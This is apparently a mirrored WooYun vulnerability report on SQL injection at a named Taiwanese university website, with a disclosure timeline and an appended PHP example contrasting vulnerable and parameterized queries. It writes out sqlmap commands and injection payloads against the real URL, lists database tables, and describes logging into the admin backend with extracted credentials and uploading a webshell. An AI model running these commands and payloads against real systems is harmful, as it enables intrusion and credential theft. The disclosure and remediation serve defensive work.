WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------- http://drop.zone.ci/
2015-07-21: Details sent to the vendor, awaiting the vendor's handling
2015-07-21: Vendor confirmed; details disclosed to the vendor only
2015-07-31: Details disclosed to core white hats and experts in the relevant field
2015-08-10: Details disclosed to regular white hats
2015-08-20: Details disclosed to intern white hats
2015-09-04: Details disclosed to the public
Chaoyang University of Technology in Taiwan is a private technical university. I was originally practising Google hacking, then came across this site, thought it looked vulnerable and took a look. I was also curious how WooYun would notify them.

There is SQL injection, and it leads to getting a webshell.
sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent --dbs

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: no=936 AND 6560=6560&no2=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: no=936 UNION ALL SELECT CONCAT(0x7162716b71,0x69744949634270505145,0x717a6b7871),NULL,NULL,NULL,NULL#&no2=1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: no=936 AND (SELECT * FROM (SELECT(SLEEP(5)))ZuUm)&no2=1
---
[01:32:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[01:32:40] [INFO] fetching database names
[01:32:40] [INFO] the SQL query used returns 2 entries
[01:32:40] [INFO] resumed: information_schema
[01:32:40] [INFO] resumed: ctlnew
available databases [2]:
[*] ctlnew
[*] information_schema

Then look for user credentials:

sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent -D ctlnew --tables

[31 tables]
+----------------------+
| #mysql50#equipment-c |
| #mysql50#newsdata-c  |
| level                |
| user                 |
| active               |
| activedata           |
| association          |
| associationtype      |
| download             |
| downloadtype         |
| equipment            |
| handbook             |
| handbooktype         |
| job                  |
| jobdata              |
| jobtype              |
| law                  |
| link                 |
| manual               |
| member               |
| news                 |
| newsdata             |
| plan                 |
| plandata             |
| plangroup            |
| planperson           |
| profess              |
| question             |
| questiontype         |
| result               |
| resultdata           |
+----------------------+

In the user table there is adminacad. The admin backend is found via http://ctl.cyut.edu.tw/robots.txt. We can login at http://ctl.cyut.edu.tw/ctlback/login.php. btw, the phpmyadmin has a good alias.

Ah, I can type Chinese again, so happy. After logging in with the username and password obtained earlier, go to http://ctl.cyut.edu.tw/accback/, edit an old announcement and upload a webshell. At the very bottom, under the announcement "98學年度第一學期進修部就學貸款溢貸金額於12/10(星期四)退費", the attachment is visible; clicking it goes straight in.
Filter the input.
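To make the fix concrete, here is an added example (not the site's actual source, which the report does not include) of a news-detail handler written the way the reported injection points imply, next to a hardened version. Table and column names (newsdata, title, body) and the mysqli connection are assumptions.

```php
<?php
// Added example, not the site's code: hypothetical handler behind
// news/new_detail.php?no=936&no2=1. Table/column names are assumed.

// --- Vulnerable: the GET values are concatenated straight into the SQL.
// Every payload sqlmap reported above (boolean, UNION, time-based) works
// because the input becomes part of the query text, not a value.
function news_detail_vulnerable(mysqli $db, array $get): ?array
{
    $sql = "SELECT title, body FROM newsdata WHERE no = " . $get['no']
         . " AND no2 = " . $get['no2'];
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened: validate the type first, then bind the values as
// parameters so they can never alter the query structure. Rejecting
// bad input is safer than trying to "clean" it with string filtering.
function news_detail_safe(mysqli $db, array $get): ?array
{
    $opts = ['options' => ['min_range' => 1]];
    $no   = filter_var($get['no']  ?? null, FILTER_VALIDATE_INT, $opts);
    $no2  = filter_var($get['no2'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($no === false || $no2 === false) {
        http_response_code(400);   // e.g. "936 AND 6560=6560" is not an int
        return null;
    }
    $stmt = $db->prepare(
        'SELECT title, body FROM newsdata WHERE no = ? AND no2 = ?'
    );
    $stmt->bind_param('ii', $no, $no2);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

The same pattern applies to every other page that reads an id from the query string; the database account the web app uses should also be limited to the ctlnew schema with only the privileges the pages need.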
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-07-21 17:17
Thank you for the report!
None yet